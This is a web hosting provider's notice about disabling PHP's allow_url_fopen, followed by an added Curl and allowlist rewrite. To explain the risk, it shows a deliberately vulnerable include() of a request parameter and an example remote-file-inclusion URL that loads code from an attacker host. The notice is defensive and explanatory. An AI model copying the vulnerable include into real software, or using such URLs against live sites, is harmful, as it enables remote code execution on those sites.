Brief: On Monday November 24th we will be changing a php.ini configuration option on all of our shared hosting servers which may affect your website code.
Currently all Shared and Reseller Linux servers run with the option allow_url_fopen=On. On November 24th we will be changing the option to allow_url_fopen=Off.
The reasons for this change and its impact are as follows…
With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications, such as retrieving RSS feeds. Unfortunately, it also leads to unexpected results and serious security problems in many applications, because any function that takes a filename can be pointed at a remote server. For example, consider the following simple code…
<?php
// Deliberately vulnerable: the path handed to include() comes straight from the request
$pagef = $_REQUEST["pagef"];
include ($pagef);
The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…
http://mydomain.com/display.php?pagef=footer.html
An attacker can craft his own URL and exploit this page to download and execute his own code on your web site, e.g.
http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt
Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might, for example, use
readfile("http://feeds.feedburner.com/DilbertDailyStrip");
to retrieve a remote RSS feed will no longer work.
What you need to do: The supported alternative is Curl, which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions; however, you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php
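As an added example (not part of this notice and not the hosting provider's code), here is the include pattern above rewritten so that it keeps working with allow_url_fopen=Off, together with a small Curl wrapper that replaces readfile() on the feed URL. The includes/ directory, the page keys and both helper function names are assumptions.

```php
<?php
// Added example, not the hosting provider's code: the include pattern from
// the notice rewritten so it works with allow_url_fopen=Off, plus a curl
// wrapper that replaces readfile() on a remote feed URL.
// The includes/ directory, the page keys and both helper names are assumptions.

// 1. Map request keys to a fixed set of local files. The request only
//    selects a key; it never supplies a path, so include() never sees a URL.
$allowed_pages = array(
    'footer'  => 'footer.html',
    'sidebar' => 'sidebar.html',
);

function include_page(array $allowed, $requested)
{
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return false;                       // unknown key: include nothing
    }
    include dirname(__FILE__) . '/includes/' . $allowed[$requested];
    return true;
}

// 2. Fetch a remote resource with the curl extension instead of readfile().
//    Returns the body as a string, or false on any transport/HTTP failure.
function fetch_remote($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   // return body, do not echo it
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);  // do not follow redirects silently
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);      // bound the wait on an unreachable host
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $body   = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if ($body === false || $status !== 200) {
        return false;
    }
    return $body;
}

// Usage: display.php?pagef=footer selects the footer from the allowlist.
$key = isset($_REQUEST['pagef']) ? $_REQUEST['pagef'] : 'footer';
include_page($allowed_pages, $key);

// Usage: the feed body is handed to a parser rather than echoed raw into the page.
$feed = fetch_remote('http://feeds.feedburner.com/DilbertDailyStrip');
if ($feed !== false) {
    $xml = simplexml_load_string($feed);  // e.g. parse the RSS with SimpleXML
}
```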